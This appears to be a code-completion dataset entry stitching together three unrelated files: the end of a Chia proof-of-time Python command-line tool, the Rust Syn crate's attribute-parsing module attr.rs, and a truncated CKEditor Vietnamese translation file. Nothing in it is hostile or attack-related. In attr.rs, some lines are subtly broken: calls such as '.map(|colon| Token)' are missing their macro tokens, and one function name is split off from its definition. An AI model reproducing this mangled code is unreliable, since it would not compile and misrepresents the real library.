if args.type == "wesolowski":
ok = check_proof_of_time_wesolowski(
discriminant, x, args.proof, args.iterations, args.length)
elif args.type == "n-wesolowski":
ok = check_proof_of_time_nwesolowski(
discriminant, x, args.proof, args.iterations, args.length)
elif args.type == "pietrzak":
ok = check_proof_of_time_pietrzak(
discriminant, x, args.proof, args.iterations, args.length)
if ok:
print("Proof is valid")
else:
print("** INVALID PROOF")
return -1
else:
start_t = time.time() * 1000
if args.type == "wesolowski":
result, proof = create_proof_of_time_wesolowski(
discriminant, x, args.iterations, args.length)
elif args.type == "n-wesolowski":
result, proof = create_proof_of_time_nwesolowski(
discriminant, x, args.iterations, args.length, args.depth, 0)
elif args.type == "pietrzak":
result, proof = create_proof_of_time_pietrzak(
discriminant, x, args.iterations, args.length)
if args.verbose:
print("Finished in ", round(((time.time() * 1000) - start_t), 2), "ms")
hex_result = binascii.hexlify(result).decode("utf8")
hex_proof = binascii.hexlify(proof).decode("utf8")
print(hex_result + hex_proof)
"""
Copyright 2018 Chia Network Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| create_pot_parser |
attr.rs | use super::*;
use crate::punctuated::Punctuated;
use proc_macro2::TokenStream;
use std::iter;
#[cfg(feature = "parsing")]
use crate::parse::{Parse, ParseBuffer, ParseStream, Parser, Result};
#[cfg(feature = "parsing")]
use crate::punctuated::Pair;
ast_struct! {
/// An attribute like `#[repr(transparent)]`.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
///
/// <br>
///
/// # Syntax
///
/// Rust has six types of attributes.
///
/// - Outer attributes like `#[repr(transparent)]`. These appear outside or
/// in front of the item they describe.
/// - Inner attributes like `#![feature(proc_macro)]`. These appear inside
/// of the item they describe, usually a module.
/// - Outer doc comments like `/// # Example`.
/// - Inner doc comments like `//! Please file an issue`.
/// - Outer block comments `/** # Example */`.
/// - Inner block comments `/*! Please file an issue */`.
///
/// The `style` field of type `AttrStyle` distinguishes whether an attribute
/// is outer or inner. Doc comments and block comments are promoted to
/// attributes, as this is how they are processed by the compiler and by
/// `macro_rules!` macros.
///
/// The `path` field gives the possibly colon-delimited path against which
/// the attribute is resolved. It is equal to `"doc"` for desugared doc
/// comments. The `tokens` field contains the rest of the attribute body as
/// tokens.
///
/// ```text
/// #[derive(Copy)] #[crate::precondition x < 5]
/// ^^^^^^~~~~~~ ^^^^^^^^^^^^^^^^^^^ ~~~~~
/// path tokens path tokens
/// ```
///
/// <br>
///
/// # Parsing from tokens to Attribute
///
/// This type does not implement the [`Parse`] trait and thus cannot be
/// parsed directly by [`ParseStream::parse`]. Instead use
/// [`ParseStream::call`] with one of the two parser functions
/// [`Attribute::parse_outer`] or [`Attribute::parse_inner`] depending on
/// which you intend to parse.
///
/// [`Parse`]: parse::Parse
/// [`ParseStream::parse`]: parse::ParseBuffer::parse
/// [`ParseStream::call`]: parse::ParseBuffer::call
///
/// ```
/// use syn::{Attribute, Ident, Result, Token};
/// use syn::parse::{Parse, ParseStream};
///
/// // Parses a unit struct with attributes.
/// //
/// // #[path = "s.tmpl"]
/// // struct S;
/// struct UnitStruct {
/// attrs: Vec<Attribute>,
/// struct_token: Token![struct],
/// name: Ident,
/// semi_token: Token![;],
/// }
///
/// impl Parse for UnitStruct {
/// fn parse(input: ParseStream) -> Result<Self> {
/// Ok(UnitStruct {
/// attrs: input.call(Attribute::parse_outer)?,
/// struct_token: input.parse()?,
/// name: input.parse()?,
/// semi_token: input.parse()?,
/// })
/// }
/// }
/// ```
///
/// <p><br></p>
///
/// # Parsing from Attribute to structured arguments
///
/// The grammar of attributes in Rust is very flexible, which makes the
/// syntax tree not that useful on its own. In particular, arguments of the
/// attribute are held in an arbitrary `tokens: TokenStream`. Macros are
/// expected to check the `path` of the attribute, decide whether they
/// recognize it, and then parse the remaining tokens according to whatever
/// grammar they wish to require for that kind of attribute.
///
/// If the attribute you are parsing is expected to conform to the
/// conventional structured form of attribute, use [`parse_meta()`] to
/// obtain that structured representation. If the attribute follows some
/// other grammar of its own, use [`parse_args()`] to parse that into the
/// expected data structure.
///
/// [`parse_meta()`]: Attribute::parse_meta
/// [`parse_args()`]: Attribute::parse_args
///
/// <p><br></p>
///
/// # Doc comments
///
/// The compiler transforms doc comments, such as `/// comment` and `/*!
/// comment */`, into attributes before macros are expanded. Each comment is
/// expanded into an attribute of the form `#[doc = r"comment"]`.
///
/// As an example, the following `mod` items are expanded identically:
///
/// ```
/// # use syn::{ItemMod, parse_quote};
/// let doc: ItemMod = parse_quote! {
/// /// Single line doc comments
/// /// We write so many!
/// /**
/// * Multi-line comments...
/// * May span many lines
/// */
/// mod example {
/// //! Of course, they can be inner too
/// /*! And fit in a single line */
/// }
/// };
/// let attr: ItemMod = parse_quote! {
/// #[doc = r" Single line doc comments"]
/// #[doc = r" We write so many!"]
/// #[doc = r"
/// * Multi-line comments...
/// * May span many lines
/// "]
/// mod example {
/// #![doc = r" Of course, they can be inner too"]
/// #![doc = r" And fit in a single line "]
/// }
/// };
/// assert_eq!(doc, attr);
/// ```
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub struct Attribute {
pub pound_token: Token![#],
pub style: AttrStyle,
pub bracket_token: token::Bracket,
pub path: Path,
pub tokens: TokenStream,
}
}
impl Attribute {
/// Parses the content of the attribute, consisting of the path and tokens,
/// as a [`Meta`] if possible.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_meta(&self) -> Result<Meta> {
fn clone_ident_segment(segment: &PathSegment) -> PathSegment {
PathSegment {
ident: segment.ident.clone(),
arguments: PathArguments::None,
}
}
let path = Path {
leading_colon: self
.path
.leading_colon
.as_ref()
.map(|colon| Token),
segments: self
.path
.segments
.pairs()
.map(|pair| match pair {
Pair::Punctuated(seg, punct) => {
Pair::Punctuated(clone_ident_segment(seg), Token)
}
Pair::End(seg) => Pair::End(clone_ident_segment(seg)),
})
.collect(),
};
let parser = |input: ParseStream| parsing::parse_meta_after_path(path, input);
parse::Parser::parse2(parser, self.tokens.clone())
}
/// Parse the arguments to the attribute as a syntax tree.
///
/// This is similar to `syn::parse2::<T>(attr.tokens)` except that:
///
/// - the surrounding delimiters are *not* included in the input to the
/// parser; and
/// - the error message has a more useful span when `tokens` is empty.
///
/// ```text
/// #[my_attr(value < 5)]
/// ^^^^^^^^^ what gets parsed
/// ```
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_args<T: Parse>(&self) -> Result<T> {
self.parse_args_with(T::parse)
}
/// Parse the arguments to the attribute using the given parser.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_args_with<F: Parser>(&self, parser: F) -> Result<F::Output> {
let parser = |input: ParseStream| {
let args = enter_args(self, input)?;
parse::parse_stream(parser, &args)
};
parser.parse2(self.tokens.clone())
}
/// Parses zero or more outer attributes from the stream.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_outer(input: ParseStream) -> Result<Vec<Self>> {
let mut attrs = Vec::new();
while input.peek(Token![#]) {
attrs.push(input.call(parsing::single_parse_outer)?);
}
Ok(attrs)
}
/// Parses zero or more inner attributes from the stream.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_inner(input: ParseStream) -> Result<Vec<Self>> {
let mut attrs = Vec::new();
while input.peek(Token![#]) && input.peek2(Token![!]) {
attrs.push(input.call(parsing::single_parse_inner)?);
}
Ok(attrs)
}
}
#[cfg(feature = "parsing")]
fn expected_parentheses(attr: &Attribute) -> String {
let style = match attr.style {
AttrStyle::Outer => "#",
AttrStyle::Inner(_) => "#!",
};
let mut path = String::new();
for segment in &attr.path.segments {
if !path.is_empty() || attr.path.leading_colon.is_some() {
path += "::";
}
path += &segment.ident.to_string();
}
format!("{}[{}(...)]", style, path)
}
#[cfg(feature = "parsing")]
fn enter_args<'a>(attr: &Attribute, input: ParseStream<'a>) -> Result<ParseBuffer<'a>> {
if input.is_empty() {
let expected = expected_parentheses(attr);
let msg = format!("expected attribute arguments in parentheses: {}", expected);
return Err(crate::error::new2(
attr.pound_token.span,
attr.bracket_token.span,
msg,
));
} else if input.peek(Token![=]) {
let expected = expected_parentheses(attr);
let msg = format!("expected parentheses: {}", expected);
return Err(input.error(msg));
};
let content;
if input.peek(token::Paren) {
parenthesized!(content in input);
} else if input.peek(token::Bracket) {
bracketed!(content in input);
} else if input.peek(token::Brace) {
braced!(content in input);
} else {
return Err(input.error("unexpected token in attribute arguments"));
}
if input.is_empty() {
Ok(content)
} else {
Err(input.error("unexpected token in attribute arguments"))
}
}
ast_enum! {
/// Distinguishes between attributes that decorate an item and attributes
/// that are contained within an item.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
///
/// # Outer attributes
///
/// - `#[repr(transparent)]`
/// - `/// # Example`
/// - `/** Please file an issue */`
///
/// # Inner attributes
///
/// - `#![feature(proc_macro)]`
/// - `//! # Example`
/// - `/*! Please file an issue */`
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub enum AttrStyle {
Outer,
Inner(Token![!]),
}
}
ast_enum_of_structs! {
/// Content of a compile-time structured attribute.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
///
/// ## Path
///
/// A meta path is like the `test` in `#[test]`.
///
/// ## List
///
/// A meta list is like the `derive(Copy)` in `#[derive(Copy)]`.
///
/// ## NameValue
///
/// A name-value meta is like the `path = "..."` in `#[path =
/// "sys/windows.rs"]`.
///
/// # Syntax tree enum
///
/// This type is a [syntax tree enum].
///
/// [syntax tree enum]: Expr#syntax-tree-enums
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub enum Meta {
Path(Path),
/// A structured list within an attribute, like `derive(Copy, Clone)`.
List(MetaList),
/// A name-value pair within an attribute, like `feature = "nightly"`.
NameValue(MetaNameValue),
}
}
ast_struct! {
/// A structured list within an attribute, like `derive(Copy, Clone)`.
///
/// *This type is available only if Syn is built with the `"derive"` or
/// `"full"` feature.*
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub struct MetaList {
pub path: Path,
pub paren_token: token::Paren,
pub nested: Punctuated<NestedMeta, Token![,]>,
}
}
ast_struct! {
/// A name-value pair within an attribute, like `feature = "nightly"`.
///
/// *This type is available only if Syn is built with the `"derive"` or
/// `"full"` feature.*
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub struct MetaNameValue {
pub path: Path,
pub eq_token: Token![=],
pub lit: Lit,
}
}
impl Meta {
/// Returns the identifier that begins this structured meta item.
///
/// For example this would return the `test` in `#[test]`, the `derive` in
/// `#[derive(Copy)]`, and the `path` in `#[path = "sys/windows.rs"]`.
pub fn path(&self) -> &Path {
match self {
Meta::Path(path) => path,
Meta::List(meta) => &meta.path,
Meta::NameValue(meta) => &meta.path,
}
}
}
ast_enum_of_structs! {
/// Element of a compile-time attribute list.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub enum NestedMeta {
/// A structured meta item, like the `Copy` in `#[derive(Copy)]` which
/// would be a nested `Meta::Path`.
Meta(Meta),
/// A Rust literal, like the `"new_name"` in `#[rename("new_name")]`.
Lit(Lit),
}
}
/// Conventional argument type associated with an invocation of an attribute
/// macro.
///
/// For example if we are developing an attribute macro that is intended to be
/// invoked on function items as follows:
///
/// ```
/// # const IGNORE: &str = stringify! {
/// #[my_attribute(path = "/v1/refresh")]
/// # };
/// pub fn refresh() {
/// /* ... */
/// }
/// ```
///
/// The implementation of this macro would want to parse its attribute arguments
/// as type `AttributeArgs`.
///
/// ```
/// # extern crate proc_macro;
/// #
/// use proc_macro::TokenStream;
/// use syn::{parse_macro_input, AttributeArgs, ItemFn};
///
/// # const IGNORE: &str = stringify! {
/// #[proc_macro_attribute]
/// # };
/// pub fn my_attribute(args: TokenStream, input: TokenStream) -> TokenStream {
/// let args = parse_macro_input!(args as AttributeArgs);
/// let input = parse_macro_input!(input as ItemFn);
///
/// /* ... */
/// # "".parse().unwrap()
/// }
/// ```
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub type AttributeArgs = Vec<NestedMeta>;
pub trait FilterAttrs<'a> {
type Ret: Iterator<Item = &'a Attribute>;
fn outer(self) -> Self::Ret;
fn inner(self) -> Self::Ret;
}
impl<'a, T> FilterAttrs<'a> for T
where
T: IntoIterator<Item = &'a Attribute>,
{
type Ret = iter::Filter<T::IntoIter, fn(&&Attribute) -> bool>;
fn outer(self) -> Self::Ret {
fn is_outer(attr: &&Attribute) -> bool {
match attr.style {
AttrStyle::Outer => true,
AttrStyle::Inner(_) => false,
}
}
self.into_iter().filter(is_outer)
}
fn inner(self) -> Self::Ret {
fn is_inner(attr: &&Attribute) -> bool {
match attr.style {
AttrStyle::Inner(_) => true,
AttrStyle::Outer => false,
}
}
self.into_iter().filter(is_inner)
}
}
#[cfg(feature = "parsing")]
pub mod parsing {
use super::*;
use crate::ext::IdentExt;
use crate::parse::{Parse, ParseStream, Result};
#[cfg(feature = "full")]
use crate::private;
pub fn single_parse_inner(input: ParseStream) -> Result<Attribute> {
let content;
Ok(Attribute {
pound_token: input.parse()?,
style: AttrStyle::Inner(input.parse()?),
bracket_token: bracketed!(content in input),
path: content.call(Path::parse_mod_style)?,
tokens: content.parse()?,
})
}
pub fn single_parse_outer(input: ParseStream) -> Result<Attribute> {
let content;
Ok(Attribute {
pound_token: input.parse()?,
style: AttrStyle::Outer,
bracket_token: bracketed!(content in input),
path: content.call(Path::parse_mod_style)?,
tokens: content.parse()?,
})
}
#[cfg(feature = "full")]
impl private {
pub(crate) fn attrs(outer: Vec<Attribute>, inner: Vec<Attribute>) -> Vec<Attribute> {
let mut attrs = outer;
attrs.extend(inner);
attrs
}
}
// Like Path::parse_mod_style but accepts keywords in the path.
fn parse_meta_path(input: ParseStream) -> Result<Path> {
Ok(Path {
leading_colon: input.parse()?,
segments: {
let mut segments = Punctuated::new();
while input.peek(Ident::peek_any) {
let ident = Ident::parse_any(input)?;
segments.push_value(PathSegment::from(ident));
if !input.peek(Token![::]) {
break;
}
let punct = input.parse()?;
segments.push_punct(punct);
}
if segments.is_empty() {
return Err(input.error("expected path"));
} else if segments.trailing_punct() {
return Err(input.error("expected path segment"));
}
segments
},
})
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for Meta {
fn parse(input: ParseStream) -> Result<Self> {
let path = input.call(parse_meta_path)?;
parse_meta_after_path(path, input)
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for MetaList {
fn parse(input: ParseStream) -> Result<Self> {
let path = input.call(parse_meta_path)?;
parse_meta_list_after_path(path, input)
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for MetaNameValue {
fn parse(input: ParseStream) -> Result<Self> {
let path = input.call(parse_meta_path)?;
parse_meta_name_value_after_path(path, input)
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for NestedMeta {
fn parse(input: ParseStream) -> Result<Self> {
if input.peek(Lit) && !(input.peek(LitBool) && input.peek2(Token![=])) {
input.parse().map(NestedMeta::Lit)
} else if input.peek(Ident::peek_any)
|| input.peek(Token![::]) && input.peek3(Ident::peek_any)
{
input.parse().map(NestedMeta::Meta)
} else {
Err(input.error("expected identifier or literal"))
}
}
}
pub fn | (path: Path, input: ParseStream) -> Result<Meta> {
if input.peek(token::Paren) {
parse_meta_list_after_path(path, input).map(Meta::List)
} else if input.peek(Token![=]) {
parse_meta_name_value_after_path(path, input).map(Meta::NameValue)
} else {
Ok(Meta::Path(path))
}
}
fn parse_meta_list_after_path(path: Path, input: ParseStream) -> Result<MetaList> {
let content;
Ok(MetaList {
path,
paren_token: parenthesized!(content in input),
nested: content.parse_terminated(NestedMeta::parse)?,
})
}
fn parse_meta_name_value_after_path(path: Path, input: ParseStream) -> Result<MetaNameValue> {
Ok(MetaNameValue {
path,
eq_token: input.parse()?,
lit: input.parse()?,
})
}
}
#[cfg(feature = "printing")]
mod printing {
use super::*;
use proc_macro2::TokenStream;
use quote::ToTokens;
#[cfg_attr(doc_cfg, doc(cfg(feature = "printing")))]
impl ToTokens for Attribute {
fn to_tokens(&self, tokens: &mut TokenStream) {
self.pound_token.to_tokens(tokens);
if let AttrStyle::Inner(b) = &self.style {
b.to_tokens(tokens);
}
self.bracket_token.surround(tokens, |tokens| {
self.path.to_tokens(tokens);
self.tokens.to_tokens(tokens);
});
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "printing")))]
impl ToTokens for MetaList {
fn to_tokens(&self, tokens: &mut TokenStream) {
self.path.to_tokens(tokens);
self.paren_token.surround(tokens, |tokens| {
self.nested.to_tokens(tokens);
})
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "printing")))]
impl ToTokens for MetaNameValue {
fn to_tokens(&self, tokens: &mut TokenStream) {
self.path.to_tokens(tokens);
self.eq_token.to_tokens(tokens);
self.lit.to_tokens(tokens);
}
}
}
| parse_meta_after_path |
vi.js | /*
Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
/**
* @fileOverview Defines the {@link CKEDITOR.lang} object, for the
* Vietnamese language.
*/
/**#@+
@type String
@example
*/
/**
* Contains the dictionary of language entries.
* @namespace
*/
CKEDITOR.lang['vi'] =
{
/**
* The language reading direction. Possible values are "rtl" for
* Right-To-Left languages (like Arabic) and "ltr" for Left-To-Right
* languages (like English).
* @default 'ltr'
*/
dir : 'trái-qua-phải',
/*
* Screenreader titles. Please note that screenreaders are not always capable
* of reading non-English words. So be careful while translating it.
*/
editorTitle : 'Trình soạn thảo phong phú, %1',
editorHelp : 'Nhấn ALT + 0 để được giúp đỡ',
// ARIA descriptions.
toolbars : 'Thanh công cụ',
editor : 'Bộ soạn thảo',
// Toolbar buttons without dialogs.
source : 'Mã HTML',
newPage : 'Trang mới',
save : 'Lưu',
preview : 'Xem trước',
cut : 'Cắt',
copy : 'Sao chép',
paste : 'Dán',
print : 'In',
underline : 'Gạch chân',
bold : 'Đậm',
italic : 'Nghiêng',
selectAll : 'Chọn tất cả',
removeFormat : 'Xoá định dạng',
strike : 'Gạch xuyên ngang',
subscript : 'Chỉ số dưới',
superscript : 'Chỉ số trên',
horizontalrule : 'Chèn đường phân cách ngang',
pagebreak : 'Chèn ngắt trang',
pagebreakAlt : 'Ngắt trang',
unlink : 'Xoá liên kết',
undo : 'Khôi phục thao tác',
redo : 'Làm lại thao tác',
// Common messages and labels.
common :
{
browseServer : 'Duyệt trên máy chủ',
url : 'URL',
protocol : 'Giao thức',
upload : 'Tải lên',
uploadSubmit : 'Tải lên máy chủ',
image : 'Hình ảnh',
flash : 'Flash',
form : 'Biểu mẫu',
checkbox : 'Nút kiểm',
radio : 'Nút chọn',
textField : 'Trường văn bản',
textarea : 'Vùng văn bản',
hiddenField : 'Trường ẩn',
button : 'Nút',
select : 'Ô chọn',
imageButton : 'Nút hình ảnh',
notSet : '<không thiết lập>',
id : 'Định danh',
name : 'Tên',
langDir : 'Hướng ngôn ngữ',
langDirLtr : 'Trái sang phải (LTR)',
langDirRtl : 'Phải sang trái (RTL)',
langCode : 'Mã ngôn ngữ',
longDescr : 'Mô tả URL',
cssClass : 'Lớp Stylesheet',
advisoryTitle : 'Nhan đề hướng dẫn',
cssStyle : 'Kiểu (style)',
ok : 'Đồng ý',
cancel : 'Bỏ qua',
close : 'Đóng',
preview : 'Xem trước',
generalTab : 'Tab chung',
advancedTab : 'Tab mở rộng',
validateNumberFailed : 'Giá trị này không phải là số.',
confirmNewPage : 'Mọi thay đổi không được lưu lại, nội dung này sẽ bị mất. Bạn có chắc chắn muốn tải một trang mới?',
confirmCancel : 'Một vài tùy chọn đã bị thay đổi. Bạn có chắc chắn muốn đóng hộp thoại?',
options : 'Tùy chọn',
target : 'Đích đến',
targetNew : 'Cửa sổ mới (_blank)',
targetTop : 'Cửa sổ trên cùng (_top)',
targetSelf : 'Tại trang (_self)',
targetParent : 'Cửa sổ cha (_parent)',
langDirLTR : 'Trái sang phải (LTR)',
langDirRTL : 'Phải sang trái (RTL)',
styles : 'Kiểu',
cssClasses : 'Lớp CSS',
width : 'Chiều rộng',
height : 'chiều cao',
align : 'Vị trí',
alignLeft : 'Trái',
alignRight : 'Phải',
alignCenter : 'Giữa',
alignTop : 'Trên',
alignMiddle : 'Giữa',
alignBottom : 'Dưới',
invalidHeight : 'Chiều cao phải là số nguyên.',
invalidWidth : 'Chiều rộng phải là số nguyên.',
invalidCssLength : 'Giá trị quy định cho trường "%1" phải là một số dương có hoặc không có một đơn vị đo CSS hợp lệ (px, %, in, cm, mm, em, ex, pt, hoặc pc).',
invalidHtmlLength : 'Giá trị quy định cho trường "%1" phải là một số dương có hoặc không có một đơn vị đo HTML hợp lệ (px hoặc %).',
invalidInlineStyle : 'Giá trị quy định cho kiểu nội tuyến phải bao gồm một hoặc nhiều dữ liệu với định dạng "tên:giá trị", cách nhau bằng dấu chấm phẩy.',
cssLengthTooltip : 'Nhập một giá trị theo pixel hoặc một số với một đơn vị CSS hợp lệ (px, %, in, cm, mm, em, ex, pt, hoặc pc).',
// Put the voice-only part of the label in the span.
unavailable : '%1<span class="cke_accessibility">, không có</span>'
},
contextmenu :
{
options : 'Tùy chọn menu bổ xung'
},
// Special char dialog.
specialChar :
{
toolbar : 'Chèn ký tự đặc biệt',
title : 'Hãy chọn ký tự đặc biệt',
options : 'Tùy chọn các ký tự đặc biệt'
},
// Link dialog.
link :
{
toolbar : 'Chèn/Sửa liên kết',
other : '<khác>',
menu : 'Sửa liên kết',
title : 'Liên kết',
info : 'Thông tin liên kết',
target : 'Đích',
upload : 'Tải lên',
advanced : 'Mở rộng',
type : 'Kiểu liên kết',
toUrl : 'URL',
toAnchor : 'Neo trong trang này',
toEmail : 'Thư điện tử',
targetFrame : '<khung>',
targetPopup : '<cửa sổ popup>',
targetFrameName : 'Tên khung đích',
targetPopupName : 'Tên cửa sổ Popup',
popupFeatures : 'Đặc điểm của cửa sổ Popup',
popupResizable : 'Có thể thay đổi kích cỡ',
popupStatusBar : 'Thanh trạng thái',
popupLocationBar: 'Thanh vị trí',
popupToolbar : 'Thanh công cụ',
popupMenuBar : 'Thanh Menu',
popupFullScreen : 'Toàn màn hình (IE)',
popupScrollBars : 'Thanh cuộn',
popupDependent : 'Phụ thuộc (Netscape)',
popupLeft : 'Vị trí bên trái',
popupTop : 'Vị trí phía trên',
id : 'Định danh',
langDir : 'Hướng ngôn ngữ',
langDirLTR : 'Trái sang phải (LTR)',
langDirRTL : 'Phải sang trái (RTL)',
acccessKey : 'Phím hỗ trợ truy cập',
name : 'Tên',
langCode : 'Mã ngôn ngữ',
tabIndex : 'Chỉ số của Tab',
advisoryTitle : 'Nhan đề hướng dẫn',
advisoryContentType : 'Nội dung hướng dẫn',
cssClasses : 'Lớp Stylesheet',
charset : 'Bảng mã của tài nguyên được liên kết đến',
styles : 'Kiểu (style)',
rel : 'Quan hệ',
selectAnchor : 'Chọn một điểm neo',
anchorName : 'Theo tên điểm neo',
anchorId : 'Theo định danh thành phần',
emailAddress : 'Thư điện tử',
emailSubject : 'Tiêu đề thông điệp',
emailBody : 'Nội dung thông điệp',
noAnchors : '(Không có điểm neo nào trong tài liệu)',
noUrl : 'Hãy đưa vào đường dẫn liên kết (URL)',
noEmail : 'Hãy đưa vào địa chỉ thư điện tử'
},
// Anchor dialog
anchor :
{
toolbar : 'Chèn/Sửa điểm neo',
menu : 'Thuộc tính điểm neo',
title : 'Thuộc tính điểm neo',
name : 'Tên của điểm neo',
errorName : 'Hãy nhập vào tên của điểm neo',
remove : 'Xóa neo'
},
// List style dialog
list:
{
numberedTitle : 'Thuộc tính danh sách có thứ tự',
bulletedTitle : 'Thuộc tính danh sách không thứ tự',
type : 'Kiểu loại',
start : 'Bắt đầu',
validateStartNumber :'Số bắt đầu danh sách phải là một số nguyên.',
circle : 'Khuyên tròn',
disc : 'Hình đĩa',
square : 'Hình vuông',
none : 'Không gì cả',
notset : '<không thiết lập>',
armenian : 'Số theo kiểu Armenian',
georgian : 'Số theo kiểu Georgian (an, ban, gan...)',
lowerRoman : 'Số La Mã kiểu thường (i, ii, iii, iv, v...)',
upperRoman : 'Số La Mã kiểu HOA (I, II, III, IV, V...)',
lowerAlpha : 'Kiểu abc thường (a, b, c, d, e...)',
upperAlpha : 'Kiểu ABC HOA (A, B, C, D, E...)',
lowerGreek : 'Kiểu Hy Lạp (alpha, beta, gamma...)',
decimal : 'Kiểu số (1, 2, 3 ...)',
decimalLeadingZero : 'Kiểu số (01, 02, 03...)'
},
// Find And Replace Dialog
findAndReplace :
{
title : 'Tìm kiếm và thay thế',
find : 'Tìm kiếm',
replace : 'Thay thế',
findWhat : 'Tìm chuỗi:',
replaceWith : 'Thay bằng:',
notFoundMsg : 'Không tìm thấy chuỗi cần tìm.',
findOptions : 'Tìm tùy chọn',
matchCase : 'Phân biệt chữ hoa/thường',
matchWord : 'Giống toàn bộ từ',
matchCyclic : 'Giống một phần',
replaceAll : 'Thay thế tất cả',
replaceSuccessMsg : '%1 vị trí đã được thay thế.'
},
// Table Dialog
table :
{
toolbar : 'Bảng',
title : 'Thuộc tính bảng',
menu : 'Thuộc tính bảng',
deleteTable : 'Xóa bảng',
rows : 'Số hàng',
columns : 'Số cột',
border : 'Kích thước đường viền',
widthPx : 'Điểm ảnh (px)',
widthPc : 'Phần trăm (%)',
widthUnit : 'Đơn vị',
cellSpace : 'Khoảng cách giữa các ô',
cellPad : 'Khoảng đệm giữ ô và nội dung',
caption : 'Đầu đề',
summary : 'Tóm lược',
headers : 'Đầu đề',
headersNone : 'Không có',
headersColumn : 'Cột đầu tiên',
headersRow : 'Hàng đầu tiên',
headersBoth : 'Cả hai',
invalidRows : 'Số lượng hàng phải là một số lớn hơn 0.',
invalidCols : 'Số lượng cột phải là một số lớn hơn 0.',
invalidBorder : 'Kích cỡ của đường biên phải là một số nguyên.',
invalidWidth : 'Chiều rộng của bảng phải là một số nguyên.',
invalidHeight : 'Chiều cao của bảng phải là một số nguyên.',
invalidCellSpacing : 'Khoảng cách giữa các ô phải là một số nguyên.',
invalidCellPadding : 'Khoảng đệm giữa ô và nội dung phải là một số nguyên.',
cell :
{
menu : 'Ô',
insertBefore : 'Chèn ô Phía trước',
insertAfter : 'Chèn ô Phía sau',
deleteCell : 'Xoá ô',
merge : 'Kết hợp ô',
mergeRight : 'Kết hợp sang phải',
mergeDown : 'Kết hợp xuống dưới',
splitHorizontal : 'Phân tách ô theo chiều ngang',
splitVertical : 'Phân tách ô theo chiều dọc',
title : 'Thuộc tính của ô',
cellType : 'Kiểu của ô',
rowSpan : 'Kết hợp hàng',
colSpan : 'Kết hợp cột',
wordWrap : 'Chữ liền hàng',
hAlign : 'Canh lề ngang',
vAlign : 'Canh lề dọc',
alignBaseline : 'Đường cơ sở',
bgColor : 'Màu nền',
borderColor : 'Màu viền',
data : 'Dữ liệu',
header : 'Đầu đề',
yes : 'Có',
no : 'Không',
invalidWidth : 'Chiều rộng của ô phải là một số nguyên.',
invalidHeight : 'Chiều cao của ô phải là một số nguyên.',
invalidRowSpan : 'Số hàng kết hợp phải là một số nguyên.',
invalidColSpan : 'Số cột kết hợp phải là một số nguyên.',
chooseColor : 'Chọn màu'
},
row :
{
menu : 'Hàng',
insertBefore : 'Chèn hàng phía trước',
insertAfter : 'Chèn hàng phía sau',
deleteRow : 'Xoá hàng'
},
column :
{
menu : 'Cột',
insertBefore : 'Chèn cột phía trước',
insertAfter : 'Chèn cột phía sau',
deleteColumn : 'Xoá cột'
}
},
// Button Dialog.
button :
{
title : 'Thuộc tính của nút',
text : 'Chuỗi hiển thị (giá trị)',
type : 'Kiểu',
typeBtn : 'Nút bấm',
typeSbm : 'Nút gửi',
typeRst : 'Nút nhập lại'
},
// Checkbox and Radio Button Dialogs.
checkboxAndRadio :
{
checkboxTitle : 'Thuộc tính nút kiểm',
radioTitle : 'Thuộc tính nút chọn',
value : 'Giá trị',
selected : 'Được chọn'
},
// Form Dialog.
form :
{
title : 'Thuộc tính biểu mẫu',
menu : 'Thuộc tính biểu mẫu',
action : 'Hành động',
method : 'Phương thức',
encoding : 'Bảng mã'
},
// Select Field Dialog.
select :
{
title : 'Thuộc tính ô chọn',
selectInfo : 'Thông tin',
opAvail : 'Các tùy chọn có thể sử dụng',
value : 'Giá trị',
size : 'Kích cỡ',
lines : 'dòng',
chkMulti : 'Cho phép chọn nhiều',
opText : 'Văn bản',
opValue : 'Giá trị',
btnAdd : 'Thêm',
btnModify : 'Thay đổi',
btnUp : 'Lên',
btnDown : 'Xuống',
